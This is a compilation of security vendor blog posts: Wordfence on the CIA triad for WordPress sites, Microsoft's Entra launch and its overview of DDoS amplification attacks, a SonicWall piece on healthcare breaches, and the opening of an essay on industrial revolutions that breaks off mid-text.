The Cybersecurity CIA Triad: What You Need to Know as a WordPress Site Owner

One of the core concepts of cybersecurity is known as the CIA Triad. There are three pillars to the triad, with each pillar being designed to address an aspect of securing data. These three pillars are Confidentiality, Integrity, and Availability.

The Confidentiality pillar is intended to prevent unauthorized access to data, while the Integrity pillar ensures that data is only modified when and how it should be modified. Finally, the Availability pillar assures access to data when it is needed. When employed in unison, these three pillars work together to build an environment where data is properly protected from any type of attack, compromise, or mishap.

While managing a website may not always feel like a cybersecurity role, a crucial purpose of any website is to maintain data, which calls for the use of the CIA Triad. Managing a WordPress site is no exception to the need for the CIA Triad, even if you are not actively writing any code for the website.

As you build or update a website, it is important to keep the CIA Triad in mind when determining which plugins and functionality to include on the website. While user experience is often the main consideration, it is important to research any plugins or themes you may be considering for your website to ensure you are only installing ones that are well-maintained, and do not have a track record of being an attack vector in website data breaches. Ignoring any of the three pillars of the CIA Triad can lead to a weakness in your website which could impact your site’s users or your business. This makes it important to understand how the Triad applies to management of a WordPress site.

Maintaining the Confidentiality of Privileged Data

The Confidentiality pillar of the CIA Triad is frequently in the public eye, especially when it fails. The basic concept is that any data that should be kept private is restricted to prevent unauthorized access. Privileged data on a WordPress site can vary, but includes administrator and user credentials as well as personally identifiable information (PII) like addresses and phone numbers. Depending on the purpose of the site, additional customer information may also be included, especially in scenarios where you might be running an e-commerce or membership website. Aside from personal data, you may also have business data that should be kept confidential as well, which means that the concept of Confidentiality needs to be employed properly in order to protect this data from unauthorized access.

One thing to keep in mind is that unauthorized access can easily be accidental. Each page on a WordPress website can be set to require specific permissions for access. If you are publishing restricted information, you will need to ensure that the page is not published publicly. Even when updating a page, a good best practice is to always check the post visibility prior to publishing any changes in order to ensure that restricted data cannot be accessed without a proper access level. This check is quick, and only takes a moment to correct if the visibility is set incorrectly.

Shows how to set post visibility in wordpress

Malicious access is also something that needs to be accounted for when managing a website. One of the most common types of attacks on web applications is cross-site scripting (XSS). A danger of XSS attacks is that they are often simple for an attacker to implement, simply by generating a specially crafted URL. If an XSS vulnerability is present on the website and an attacker can convince your users, or administrators, to click on a link they have generated, they can easily steal user cookies or perform actions using the victim’s session. If the vulnerability is stored XSS, a site administrator accessing the vulnerable page may be all that is needed in order for the attacker to obtain admin access to the site. If the attacker is able to obtain authentication cookies, then they will have the same access to information on the website as the user or administrator that they stole the cookie from. Further, when it comes to WordPress sites, XSS vulnerabilities can easily be exploited to inject new administrative users or add back-doors via specially crafted JavaScript that makes it incredibly easy for attackers to gain unauthorized access to sensitive information on your WordPress site.

image showing an example XSS alert

Unauthorized access to confidential information can have lasting negative effects on a business or website owner, but taking steps to secure this data goes a long way in mitigating these risks. Whether you’re running a personal blog that collects subscriber emails addresses, or an online retail site, there will be data that should be protected from accidental and malicious access. Keeping the concept of Confidentiality in mind while building and updating your WordPress website is a critical part of protecting this data. Even if it feels like a hassle to do the initial research and choose plugins that are known for their security, you will end up saving time and money by avoiding a potential data breach in the future.

When researching themes and plugins, one aspect you will want to consider is the developer’s transparency with any vulnerabilities. A few disclosed and patched vulnerabilities likely means the developer actively fixes any problems. A theme or plugin that does not list any patched vulnerabilities in the changelog may be just as much of a problem as one that has had too many vulnerabilities, especially when the theme or plugin has been around for a significant amount of time. This signifies the importance of not just relying on whether a plugin or theme has had any previously disclosed vulnerability, but rather focusing on the transparency and communication about security management from WordPress software developers.

Ensuring the Integrity of Site Data

Integrity is the pillar that defines how data is maintained and modified. The idea here is that data should only be modified by defined individuals, and any modification should be accurate and necessary as defined by the purpose of the data. Incorrect or unnecessary changes to data can cause confusion at a minimum, and can even have legal and financial consequences in some cases. While the Confidentiality pillar plays a role here, Integrity must be addressed independently to ensure that data being accessed has not been maliciously or accidentally compromised.

Capability checks are one way that WordPress not only protects Confidentiality, but also Integrity. Any plugins should be using capability checks to ensure that the user making a change to the site information, configuration, or contained data actually has the correct permissions to make those changes. From a site owner or maintainer perspective, researching any plugins and testing any that are being considered for the website to ensure that data can only be changed by its owner, or by an appropriate level of editor or administrator. If data is available on the website in any form, it will need to be checked because a vulnerable plugin could allow an attacker to change or delete data if they know how to exploit the vulnerability. Site settings and code are also data, and if their Integrity is impacted, it can result in a complete compromise of the Confidentiality and Availability of any other data on the site.

code showing a capability check

Due to the fact that not every plugin will properly use capability checks, it is the site maintainer’s responsibility to ensure the Integrity of data. In addition to testing plugins for access errors, all users should be properly maintained with appropriate access levels. In a business setting, this will also mean that user audits will need to be performed, and any employee who leaves the company should be immediately removed or disabled on the site. In many cases, having a policy of separating contributors and editors is a good practice as well. This will provide an environment where more than one set of eyes are seeing the changes to help catch any errors in the changes made to the data. Integrity is all about proper maintenance of data, but both malicious intent and unintentional errors must be taken into account to protect the Integrity of the data.

Guaranteeing the Availability of All Data

The final pillar in the Triad is Availability. In this sense, Availability means that data is available when requested. With a WordPress website, this means that the website is online, the database is accessible, and any data that should be available to a given user is available as long as they are logged in with the correct level of access. What Availability does not mean is that data will be available to everyone at any time. The first two pillars in the triad must be taken into account when determining Availability of data. Availability is the pillar that relies more heavily on infrastructure than on what most will consider to be security.

Availability may be the most obvious pillar to the end user, as it is clear to them when a website is not available, or the data they try to access on the website won’t load. The end user may not always be able to tell when confidential information is accessed without authorization or when data is incorrectly modified, but a lack of Availability is always going to be obvious. WordPress websites have a lot of working parts, and in order for data in a WordPress site to be available upon demand, all of those parts must work together flawlessly. This means that the website must be hosted somewhere reliable, fees associated with the domain name, hosting or other aspects of the infrastructure must be paid for in a timely manner, TLS certificates need to be renewed on time, and the website software must be updated regularly.

Countless articles have been written on the importance of updating WordPress components to protect Confidentiality and Integrity, but the topic of updating for Availability is just as important. Again, limiting access and ensuring Integrity play a role here, as data can be deleted maliciously or accidentally, but proper maintenance of the components of your website are just as critical. As technologies change on web servers, or new features are added to the website, older components may become incompatible and cease to function. Keeping a proper maintenance schedule, and testing functionality after each update is an imperative part of guaranteeing the Availability of your website and the data it contains.

I’m Not A Cybersecurity Expert, How Do I Use The CIA Triad?

Fortunately, you don’t need to be a cybersecurity expert in order to keep the CIA Triad concepts at the core of the work you do. Defining policies for maintenance schedules, how to address problems with plugins, and even procedures for publishing changes to data will guide your processes. Wordfence, including Wordfence Free, provides a number of tools to help you keep to these standards, including two-factor authentication (2FA) to protect user accounts, and alerts for outdated site components or suspicious activity. The Wordfence WAF blocks attacks that threaten your data’s Confidentiality and Integrity, and the Wordfence Scan detects malware and other indicators that your data’s Integrity may have been compromised. Wordfence Premium includes the most up to date WAF rules and malware signatures as well as country blocking, and our Real-Time IP Blocklist, which keeps track of which IPs are attacking our users and blocks them so they don’t even have a chance to threaten your site.

Wordfence also offers two additional services: Wordfence Care and Wordfence Response. Both services help maintain your site’s security by following the core principles of the CIA Triad. Our team of security experts review your site initially through a complete security audit to identify ways you can improve your WordPress site’s data Confidentiality, through things like TLS certificates & cryptographic standards. Our team also recommends best practices that can improve your WordPress site’s Integrity and Availability of data, such as performing regularly maintained back-ups and not using software with known vulnerabilities. Both Wordfence Care and Wordfence Response include monitoring of your WordPress site by our team of security professionals to ensure that your site’s Confidentiality, Integrity, and Availability are not compromised, and both services include security incident response and remediation. Wordfence Response offers the same service as Wordfence Care, but with 24/7/365 Availability and a 1-hour response time.

Conclusion

Employing the CIA Triad will help any website owner or maintainer to manage the security of the data on the site, even if they are not specifically in a cybersecurity role. No matter who the website is for, the data on it needs to be confidential, accurate, and available. The concepts covered by the CIA Triad are here to guide decisions that will ensure this need is met. Employing these concepts will help you breathe easier knowing that you have minimized the chances of your data being compromised in an attack or accident.

Source :
https://www.wordfence.com/blog/2022/06/the-cybersecurity-cia-triad-what-you-need-to-know-as-a-wordpress-site-owner/

Secure access for a connected world meet Microsoft Entra

What could the world achieve if we had trust in every digital experience and interaction?

This question has inspired us to think differently about identity and access, and today, we’re announcing our expanded vision for how we will help provide secure access for our connected world.

Microsoft Entra is our new product family that encompasses all of Microsoft’s identity and access capabilities. The Entra family includes Microsoft Azure Active Directory (Azure AD), as well as two new product categories: Cloud Infrastructure Entitlement Management (CIEM) and decentralized identity. The products in the Entra family will help provide secure access to everything for everyone, by providing identity and access management, cloud infrastructure entitlement management, and identity verification.

The need for trust in a hyperconnected world 

Technology has transformed our lives in amazing ways. It’s reshaped how we interact with others, how we work, cultivate new skills, engage with brands, and take care of our health. It’s redefined how we do business by creating entirely new ways of serving existing needs while improving the experience, quality, speed, and cost management.

Behind the scenes of all this innovation, millions and millions of connections happen every second between people, machines, apps, and devices so that they can share and access data. These interactions create exciting opportunities for how we engage with technology and with each other—but they also create an ever-expanding attack surface with more and more vulnerabilities for people and data that need to be addressed.

It’s become increasingly important—and challenging—for organizations to address these risks as they advance their digital initiatives. They need to remove barriers to innovation, without the fear of being compromised. They need to instill trust, not only in their digital experiences and services, but in every digital interaction that powers them—every point of access between people, machines, microservices, and things.

Our expanded vision for identity and access

When the world was simpler, controlling digital access was relatively straightforward. It was just a matter of setting up the perimeter and letting only the right people in.

But that’s no longer sustainable. Organizations simply can’t put up gates around everything—their digital estates are growing, changing, and becoming boundaryless. It’s virtually impossible to anticipate and address the unlimited number of access scenarios that can occur across an organization and its supply chain, especially when it includes third-party systems, platforms, applications, and devices outside the organization’s control.

Identity is not just about directories, and access is not just about the network. Security challenges have become much broader, so we need broader solutions. We need to secure access for every customer, partner, and employee—and for every microservice, sensor, network, device, and database.

And doing this needs to be simple. Organizations don’t want to deal with incomplete and disjointed solutions that solve only one part of the problem, work in only a subset of environments, and require duct tape and bubble gum to work together. They need access decisions to be as granular as possible and to automatically adapt based on real-time assessment of risk. And they need this everywhere: on-premises, Azure AD, Amazon Web Services, Google Cloud Platform, apps, websites, devices, and whatever comes next.

This is our expanded vision for identity and access, and we will deliver it with our new product family, Microsoft Entra.

Vasu Jakkal and Joy Chik sit together and discuss new Microsoft Entra product family.

Video description: Vasu Jakkal, Corporate Vice President, Security, Compliance, Identity and Management, and Joy Chik, CVP of Identity, are unveiling Microsoft Entra, our new identity and access product family name, and are discussing the future of modern identity and access security.

Making the vision a reality: Identity as a trust fabric

To make this vision a reality, identity must evolve. Our interconnected world requires a flexible and agile model where people, organizations, apps, and even smart devices could confidently make real-time access decisions. We need to build upon and expand our capabilities to support all the scenarios that our customers are facing.

Moving forward, we’re expanding our identity and access solutions so that they can serve as a trust fabric for the entire digital ecosystem—now and long into the future.

Microsoft Entra will verify all types of identities and secure, manage, and govern their access to any resource. The new Microsoft Entra product family will:

  • Protect access to any app or resource for any user.
  • Secure and verify every identity across hybrid and multicloud environments.
  • Discover and govern permissions in multicloud environments.
  • Simplify the user experience with real-time intelligent access decisions.

This is an important step towards delivering a comprehensive set of products for identity and access needs, and we’ll continue to expand the Microsoft Entra product family.

“Identity is one of the cornerstones of our cybersecurity for the future.”

—Thomas Mueller-Lynch, Service Owner Lead for Digital Identity, Siemens

Microsoft Entra at a glance

Microsoft Azure AD, our hero identity and access management product, will be part of the Microsoft Entra family, and all its capabilities that our customers know and love, such as Conditional Access and passwordless authentication, remain unchanged. Azure AD External Identities continues to be our identity solution for customers and partners under the Microsoft Entra family.

Additionally, we are adding new solutions and announcing several product innovations as part of the Entra family.

Solutions under the Microsoft Entra product family including Microsoft Azure Active Directory, Permissions Management, and Verified ID.

Reduce access risk across clouds

The adoption of multicloud has led to a massive increase in identities, permissions, and resources across public cloud platforms. Most identities are over-provisioned, expanding organizations’ attack surface and increasing the risk of accidental or malicious permission misuse. Without visibility across cloud providers, or tools that provide a consistent experience, it’s become incredibly challenging for identity and security teams to manage permissions and enforce the principle of least privilege across their entire digital estate.

With the acquisition of CloudKnox Security last year, we are now the first major cloud provider to offer a CIEM solution: Microsoft Entra Permissions Management. It provides comprehensive visibility into permissions for all identities (both user and workload), actions, and resources across multicloud infrastructures. Permissions Management helps detect, right-size, and monitor unused and excessive permissions, and mitigates the risk of data breaches by enforcing the principle of least privilege in Microsoft Azure, Amazon Web Services, and Google Cloud Platform. Microsoft Entra Permissions Management will be a standalone offering generally available worldwide this July 2022 and will be also integrated within the Microsoft Defender for Cloud dashboard, extending Defender for Cloud’s protection with CIEM.

Additionally, with the preview of workload identity management in Microsoft Entra, customers can assign and secure identities for any app or service hosted in Azure AD by extending the reach of access control and risk detection capabilities.

Enable secure digital interactions that respect privacy

At Microsoft, we deeply value, protect, and defend privacy, and nowhere is privacy more important than your personal identity. After several years of working alongside the decentralized identity community, we’re proud to announce a new product offering: Microsoft Entra Verified ID, based on decentralized identity standards. Verified ID implements the industry standards that make portable, self-owned identity possible. It represents our commitment to an open, trustworthy, interoperable, and standards-based decentralized identity future for individuals and organizations. Instead of granting broad consent to countless apps and services and spreading identity data across numerous providers, Verified ID allows individuals and organizations to decide what information they share, when they share it, with whom they share it, and—when necessary—take it back.

The potential scenarios for decentralized identity are endless. When we can verify the credentials of an organization in less than a second, we can conduct business-to-business and business-to-customer transactions with greater efficiency and confidence. Conducting background checks becomes faster and more reliable when individuals can digitally store and share their education and certification credentials. Managing our health becomes less stressful when both doctor and patient can verify each other’s identity and trust that their interactions are private and secure. Microsoft Entra Verified ID will be generally available in early August 2022.

“We thought, ‘Wouldn’t it be fantastic to take a world-leading technology like Microsoft Entra and implement Verified ID for employees in our own office environment?’ We easily identified business opportunities where it would help us work more efficiently.”

—Chris Tate, Chief Executive Officer, Condatis

Automate critical Identity Governance scenarios

Next, let’s focus on Identity Governance for employees and partners. It’s an enormous challenge for IT and security teams to provision new users and guest accounts and manage their access rights manually. This can have a negative impact on both IT and individual productivity. New employees often experience a slow ramp-up to full effectiveness while they wait for the access required for their jobs. Similar delays in granting necessary access to guest users undermine a smoothly functioning supply chain. Then, without formal or automated processes for reprovisioning or deactivating people’s accounts, their access rights may remain in place when they change roles or exit the organization.

Identity Governance addresses this with identity lifecycle management, which simplifies the processes for onboarding and offboarding users. Lifecycle workflows automate assigning and managing access rights, and monitoring and tracking access, as user attributes change. Lifecycle workflows in Identity Governance will enter public preview this July 2022.

“We were so reactive for so long with old technology, it was a struggle. [With Azure AD Identity Governance] we’re finally able to be proactive, and we can field some of those complex requests from the business side of our organization.”

—Sally Harrison, Workplace Modernization Consultant, Mississippi Division of Medicaid

Create possibilities, not barriers

Microsoft Entra embodies our vision for what modern secure access should be. Identity should be an entryway into a world of new possibilities, not a blockade restricting access, creating friction, and holding back innovation. We want people to explore, to collaborate, to experiment—not because they are reckless, but because they are fearless.

Visit the Microsoft Entra website to learn more about how Azure AD, Microsoft Entra Permissions Management, and Microsoft Entra Verified ID deliver secure access for our connected world.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

Source :
https://www.microsoft.com/security/blog/2022/05/31/secure-access-for-a-connected-worldmeet-microsoft-entra/

Anatomy of a DDoS amplification attack

Amplification attacks are one of the most common distributed denial of service (DDoS) attack vectors. These attacks are typically categorized as flooding or volumetric attacks, where the attacker succeeds in generating more traffic than the target can process, resulting in exhausting its resources due to the amount of traffic it receives. 

In this blog, we start by surveying the anatomy and landscape of amplification attacks, while providing statistics from Azure on most common attack vectors, volumes, and distribution. We then describe some of the countermeasures taken in Azure to mitigate amplification attacks. 

DDoS amplification attacks, what are they? 

Reflection attacks involve three parties: an attacker, a reflector, and a target. The attacker spoofs the IP address of the target to send a request to a reflector (e.g., open server, middlebox) that responds to the target, a virtual machine (VM) in this case. For the attack to be amplified the response should be larger than the request, resulting in a reflected amplification attack. The attacker’s motivation is to create the largest reflection out of the smallest requests. Attackers achieve this goal by finding many reflectors and crafting the requests that result in the highest amplification. 

The diagram illustrates how the attacker pushes a reflection attack to a target virtual machine that is hosted in Azure.
Figure 1. Reflected amplification attack

The root cause for reflected amplification attacks is that an attacker can force reflectors to respond to targets by spoofing the source IP address. If spoofing was not possible, this attack vector would be mitigated. Lots of effort has thus been made on disabling IP source address spoofing, and many organizations prevent spoofing nowadays so that attackers cannot leverage their networks for amplification attacks. Unfortunately, a significant number of organizations still allow source spoofing. The Spoofer project shows that a third of the IPv4 autonomous systems allow or partially allow spoofing.  

UDP and TCP amplification attacks 

Most attackers utilize UDP to launch amplification attacks since reflection of traffic with spoofed IP source address is possible due to the lack of proper handshake.  

While UDP makes it easy to launch reflected amplification attacks, TCP has a 3-way handshake that complicates spoofing attacks. As a result, IP source address spoofing is restricted to the start of the handshake. Although the TCP handshake allows for reflection, it does not allow for easy amplification since TCP SYN+ACK response is not larger than TCP SYN. Moreover, since the TCP SYN+ACK response is sent to the target, the attacker never receives it and can’t learn critical information contained in the TCP SYN+ACK needed to complete the 3-way handshake successfully to continue making requests on behalf of the target. 

The diagram illustrates how an attacker conducts a reflection attack in TCP. The attacker sends through SYN, then the reflector reflects packets restransmitted through SYN + ACK combination, which then sends an out-of-state SYN + ACK attack to the target virtual device.
Figure 2. Reflection attack in TCP 

In recent years, however, reflection and amplification attacks based on TCP have started emerging.  

Independent research found newer TCP reflected amplification vectors that utilize middleboxes, such as nation-state censorship firewalls and other deep packet inspection devices, to launch volumetric floods. Middleboxes devices may be deployed in asymmetric routing environments, where they only see one side of the TCP connection (e.g., packets from clients to servers). To overcome this asymmetry, such middleboxes often implement non-compliant TCP stack. Attackers take advantage of this misbehavior – they do not need to complete the 3-way handshake. They can generate a sequence of requests that elicit amplified responses from middleboxes and can reach infinite amplification in some cases. The industry has started witnessing these kinds of attacks from censorship and enterprise middle boxes, such as firewalls and IDPS devices, and we expect to see this trend growing as attackers look for more ways to create havoc utilizing DDoS as a primary weapon.  

Carpet bombing is another example of a reflected amplification attack. It often utilizes UDP reflection, and in recent years TCP reflection as well. With carpet bombing, instead of focusing the attack on a single or few destinations, the attacker attacks many destinations within a specific subnet or classless inter-domain routing (CIDR) block (for example /22). This will make it more difficult to detect the attack and to mitigate it, since such attacks can fly below prevalent baseline-based detection mechanisms. 

This diagram shows how an attacker uses reflectors to send spoofed packets to many target devices within a specific subnet hosted in Azure.
Figure 3. Carpet bombing attack 

One example of TCP carpet bombing is TCP SYN+ACK reflection, where attacker sends spoofed SYN to a wide range of random or pre-selected reflectors. In this attack, amplification is a result of reflectors that retransmit the TCP SYN+ACK when they do not get a response. The amplification of the TCP SYN+ACK response itself may not be large, and it depends on the number of retransmissions sent by the reflector. In Figure 3, the reflected attack traffic towards each of the target virtual machines (VMs) may not be enough to bring them down, however, collectively, the traffic may well overwhelm the targets’ network. 

UDP and TCP amplification attacks in Azure 

In Azure, we continuously work to mitigate inbound (from internet to Azure) and outbound (from Azure to internet) amplification attacks. In the last 12 months, we mitigated approximately 175,000 UDP reflected amplification attacks. We monitored more than 10 attack vectors, where the most common ones are NTP with 49,700 attacks, DNS with 42,600 attacks, SSDP with 27,100 attacks, and Memcached with 18,200 attacks. These protocols can demonstrate amplification factors of up to x4,670, x98, x76 and x9,000 respectively. 

This pie chart shows the volume of UDP- reflected amplification attacks observed in Azure from April 1, 2021, to March 31, 2022. The highest volume observed is 28% through NTP, while the least volume observed is 2% through Open VPN.
Figure 4. UDP reflected amplification attacks observed from April 1, 2021, to March 31, 2022

We measured the maximum attack throughput in packets per second for a single attack across all attack vectors. The highest throughput was a 58 million packets per second (pps) SSDP flood in August last year, in a short attack campaign that lasted 20 minutes on a single resource in Azure. 

This bar chart shows the packets per second flooding observed from April 1, 2021, to March 31, 2022 in Azure. The tallest bar represents the maximum observed throughput of 58 million packets per second SSDP flooding, while the shortest bar represents below 10M packets per second CharGEN flooding.
Figure 5. Maximum pps recorded for a single attack observed from April 1, 2021, to March 31, 2022 

TCP reflected amplification attacks are becoming more prevalent, with new attack vectors discovered. We encounter these attacks on Azure resources utilizing diverse types of reflectors and attack vectors. 

One such example is a TCP reflected amplification attack of TCP SYN+ACK on an Azure resource in Asia. Attack reached 30 million pps and lasted 15 minutes. Attack throughput was not high, however there were approximately 900 reflectors involved, each with retransmissions, resulting in a high pps rate that can bring down the host and other network infrastructure elements. 

This line chart shows the TCP SYN+ACK amplification attack volume on a single resource as seen on Azure. The line chart shows a spike reaching 30 million packets per second with a 15 minute duration. The 15-minute window illustrates the packets per second volume going down in the middle of the 15-minute window, and tapers off abruptly at the end of the 15-minute window.
Figure 6. TCP SYN+ACK amplification attack volume on an Azure resource in Asia

We see many TCP SYN+ACK retransmissions associated with the reflector that doesn’t get the ACK response from the spoofed source. Here is an example of such a retransmission: 

This screenshot shows a TCP SYN+ACK retransmission that doesn't get the ACK response. The screenshot highlights the information from source to destination and through which protocol it passes.

The retransmitted packet was sent 60 seconds after the first. 

Mitigating amplification attacks in Azure 

Reflected amplification attacks are here to stay and pose a serious challenge for the internet community. They continue to evolve and exploit new vulnerabilities in protocols and software implementations to bypass conventional countermeasures. Amplification attacks require collaboration across the industry to minimize their effect. It is not enough to mitigate such attacks at a certain location, with a pinpoint mitigation strategy. It requires intertwining of network and DDoS mitigation capabilities. 

Azure’s network is one of the largest on the globe. We combine multiple DDoS strategies across our network and DDoS mitigation pipeline to combat reflected amplification DDOS attacks.  

On the network side, we continuously optimize and implement various traffic monitoring, traffic engineering and quality of service (QoS) techniques to block reflected amplification attacks right at the routing infrastructure. We implement these mechanisms at the edge and core of our wide area networks (WAN) network, as well as within the data centers. For inbound traffic (from the Internet), it allows us to mitigate attacks right at the edge of our network. Similarly, outbound attacks (those that originate from within our network) will be blocked right at the data center, without exhausting our WAN and leaving our network. 

On top of that, our dedicated DDoS mitigation pipeline continuously evolves to offer advanced mitigation techniques against such attacks. This mitigation pipeline offers another layer of protection, on top of our DDoS networking strategies. Together, these two protection layers provide comprehensive coverage against the largest and most sophisticated reflected amplification attacks.  

Since reflected amplification attacks are typically volumetric, it is not only enough to implement advanced mitigation strategies, but also to maintain a highly scalable mitigation pipeline to be able to cope with the largest attacks. Our mitigation pipeline can mitigate more than 60Tbps globally, and we continue to evolve it by adding mitigation capacity across all network layers.  

Different attack vectors require different treatment 

UDP-based reflected amplification attacks are tracked, monitored, detected, and mitigated for all attack vectors. There are various mitigation techniques to combat these attacks, including anomaly detection across attacked IP addresses, L4 protocols, and tracking of spoofed source IPs. Since UDP reflected amplification attacks often create fragmented packets, we monitor IP fragments to mitigate them successfully.  

TCP-based reflected amplification attacks take advantage of poor TCP stack implementations, and large set of reflectors and targets, to launch such attacks. We adopt our mitigation strategies to be able to detect and block attacks from attackers and reflectors. We employ a set of mitigations to address TCP SYN, TCP SYN+ACK, TCP ACK, and other TCP-based attacks. Mitigation combines TCP authentication mechanisms that identify spoofed packets, as well as anomaly detection to block attack traffic when data is appended to TCP packets to trigger amplification with reflectors.  

The diagram shows how Azure uses mechanisms to stop amplification attacks as soon as a packet leaves a reflector or an attacker. Azure stops spoofed attacks in the following areas: 1. Attacks coming from an attacker-controlled reflector or direct from the attacker that is located outside Azure-protected space, with the attacks going to a target virtual machine or a reflector located inside a Azure; 2. Attacks coming from an attacker located within the Azure-protected space, and the attack is going to the reflector device outside of Azure, or an attack going through a reflector device to target another virtual machine.
Figure 7. Amplification attack detection 

Get started with Azure DDoS Protection to protect against amplification attacks 

Azure’s DDoS mitigation platform mitigated the largest ever DDoS attacks in history by employing a globally distributed DDoS protection platform that scales beyond 60Tbps. We ensure our platform and customers’ workloads are always protected against DDoS attacks. To enhance our DDoS posture, we continuously collaborate with other industry players to fight reflected amplification attacks. 

Azure customers are protected against Layer 3 and Layer 4 DDoS attacks as part of protecting our infrastructure and cloud platform. However, Azure DDoS Protection Standard provides comprehensive protection for customers by auto-tuning the detection policy to the specific traffic patterns of the protected application. This ensures that whenever there are changes in traffic patterns, such as in the case of flash crowd event, the DDoS policy is automatically updated to reflect those changes for optimal protection. When a reflected amplification attack is launched against a protected application, our detection pipeline detects it automatically based on the auto-tuned policy. The mitigation policy, that is automatically set for customers, without their need to manually configure or change it, includes the needed countermeasures to block reflected amplification attacks. 

Protection is simple to enable on any new or existing virtual network and does not require any application or resource changes. Our recently released Azure built-in policies allow for better management of network security compliance by providing great ease of onboarding across all your virtual network resources and configuration of logs. 

To strengthen the security posture of applications, Azure’s network security services can work in tandem to secure your workloads, where DDoS protection is one of the tools we provide. Organizations that pursue zero trust architecture can benefit from our services to achieve better protection. 

Learn more about Azure DDoS Protection Standard 

Amir Dahan and Syed Pasha
Azure Networking Team


Source :
https://www.microsoft.com/security/blog/2022/05/23/anatomy-of-ddos-amplification-attacks/

Why Healthcare Must Do More (and Do Better) to Ensure Patient Safety

With attacks on healthcare rising dramatically, SonicWall’s Capture Cloud Platform helps ensure patient care delivery is more efficient, resilient and secure.

Within the last 30 days, data breaches at nearly 40 healthcare organizations across 20 U.S. states compromised almost 1.8 million individual records, according to the U.S. Department of Health and Human Services (HHS).

Unfortunately, this is just a snapshot of what’s shaping up to be another blistering year: The HHS breach disclosure report indicates that more than 9.5 million records have been affected thus far in 2022 (Figure 1), following last year’s record high of almost 45 million patients impacted.

As the frequency of attacks on the healthcare sector continues to rise worldwide — with recent attacks in Costa RicaFrance and Canada, among many others — the global total is sure to be much higher.

How Healthcare Hacks Occur

Hacking incidents involving network servers and email remain the leading attack vectors, making up more than 80% of the total count (Figure 2).

Figure 1

Image describing Figure 1 Chart

Figure 2

Image describing Figure 2

Image describing Figure 2

Each patient profile contains rich demographic and health information, consisting of eighteen identifiers as defined under the HIPPA privacy rule. The 18 identifiers include:

  1. Name
  2. Addresses
  3. All dates, including the individual’s birthdate, admission date, discharge date, date of death, etc.
  4. Telephone numbers
  5. Fax number
  6. Email address
  7. Social Security Number (SSN)
  8. Medical record number
  9. Health plan beneficiary number
  10. Account number
  11. Certificate or license number
  12. Vehicle identifiers and serial numbers, including license plate numbers
  13. Device identifiers and serial numbers
  14. Web URL
  15. Internet Protocol (IP) address
  16. Biometric identifiers, such as finger or voice print
  17. Full-face photo
  18. Any other characteristic that could uniquely identify the individual

Threat actors favor electronic health records (EHR) or personal health records (PHR) because they’re useful in a wide array of criminal applications, such as identity theft, insurance fraud, extortion and more. Because there are so many ways this data can be used fraudulently, cybercriminals are able to fetch a higher price for it on the dark web. Meanwhile, these illegal actions cause long-term financial and mental stress for those whose information has been stolen.

Even though we have well-funded, fully equipped anti-hacking agencies across international jurisdictions, cybercriminals can still act with impunity and without fear of getting caught. With hacking tactics, techniques and procedures (TTP) evolving and getting better at evading detection, healthcare facilities can no longer risk having inadequate or unprepared defensive capabilities.

For many of those who have been caught flatfooted, the impacts on affected patients, providers and payers have been catastrophic. Besides the risks that data breaches pose to healthcare delivery organizations (HDOs), they can also dramatically affect facilities’ ability to provide lifesaving care. In a recent Ponemon Institute report, 36 percent of surveyed healthcare organizations said they saw more complications from medical procedures and 22 percent said they experienced increased death rates due to ransomware attacks.

When lives depend on the availability of the healthcare system, healthcare cybersecurity must do more and better to ensure patient safety and anytime, anywhere care.

How SonicWall Can Help

For the past three decades, SonicWall has worked with providers to help build a healthier healthcare system. During this time, our innovations have allowed us to meet new expectations regarding improving security, increasing operation efficiencies and reducing IT costs.

Today, SonicWall works with each organization individually to establish a comprehensive defense strategy that matches their business goals and positions care professionals for success. By leveraging our depth and breadth of experience in healthcare industry operations and processes, SonicWall helps HDOs avoid surprises and spend more time focused on their primary mission: ensuring the health and well-being of the communities they serve.

The journey from “I think I’m secured” to “I’m sure I’m secured” starts with the SonicWall Boundless Cybersecurity approach. This approach binds security, central management, advanced analytics and unified threat management across SonicWall’s entire portfolio of security solutions to form the Capture Cloud Platform. The architectural diagram in Figure 3 shows how SonicWall network, edge, endpoint, cloud, wireless, zero trust access, web, email, mobile and IoT security solutions comes together as one security platform.

Figure 3

Image describing architecture

With the SonicWall Capture Cloud Platform, HDOs’ cybersecurity can do more and better by composing a custom, layered defense strategy to fit their specific needs or deploying the entire stack to establish a consistent security posture across their critical infrastructure. Combining these security solutions gives HDOs the necessary layered defense, along with a security framework to govern centrally, manage risks and comply with data protection laws.

Download SonicWall’s Boundless Cybersecurity for a Safer Healthcare Industry white paper to discover how to strengthen healthcare cybersecurity, making patient care delivery more efficient, resilient and secure.

Source :
https://blog.sonicwall.com/en-us/2022/05/why-healthcare-must-do-more-and-do-better-to-ensure-patient-safety/

Cybersecurity in the Fifth Industrial Revolution

Participate in a discussion about the impacts of rapid changes on society and businesses, pushing new development of better and more effective cybersecurity.

Think about your life without computers and other digital devices we now take for granted. If you took inventory, how many devices are in your business, at your home and on your person right at this moment? Now consider the experience of earlier generations; their entertainment, travel, communication, and even simple things like reading a newspaper or a book.

Industrial Revolutions change lives and produce excellent opportunities for growth for individuals and society. We have experienced five so far, with the first starting around 1750 and the fifth rolling out only a few years ago. So, we’re very well experienced in recognizing their implications and absorbing their benefits as well. We’re also experts in evolving from the enormous disruptions they bring.

First and Second Revolutions: The Evolution of Industries

The First Industrial Revolution was the harbinger of a massive wave of innovation. Factories sprung up in major cities, and people began producing more products than ever before. But as productivity increased, the number of jobs decreased, and the living standards of specific segments of society fell hard. Eventually, society (and economics) filled in with new jobs that serviced fledgling heavy industries. Companies needed more skilled workers to build the machines that made more machines. As a result, high-paying jobs returned, and society recovered.

But then came the Second Industrial Revolution, also known as the Technological Revolution, because it ushered in a phase of rapid scientific discovery and industrial standardization. From the late 19th century through much of the early 20th, mass production transformed factories into conveyors of productivity. As a result, while we endured a new phase of job losses and societal upheavals, we also saw the rise of highly skilled workers and higher-paying jobs that afforded better homes and greater mobility.

Third and Fourth Revolutions: The Evolution of Modern Society

The Third Industrial Revolution began in the later parts of the 20th century as the need for better automation triggered the advent of electronics, then computers, followed by the invention of the Internet. Technological advancements began fundamental economic transformation and, along with it, greater volatility. In addition, new methods of communication converged with rapid global urbanization and new energy regimes such as renewable sources.

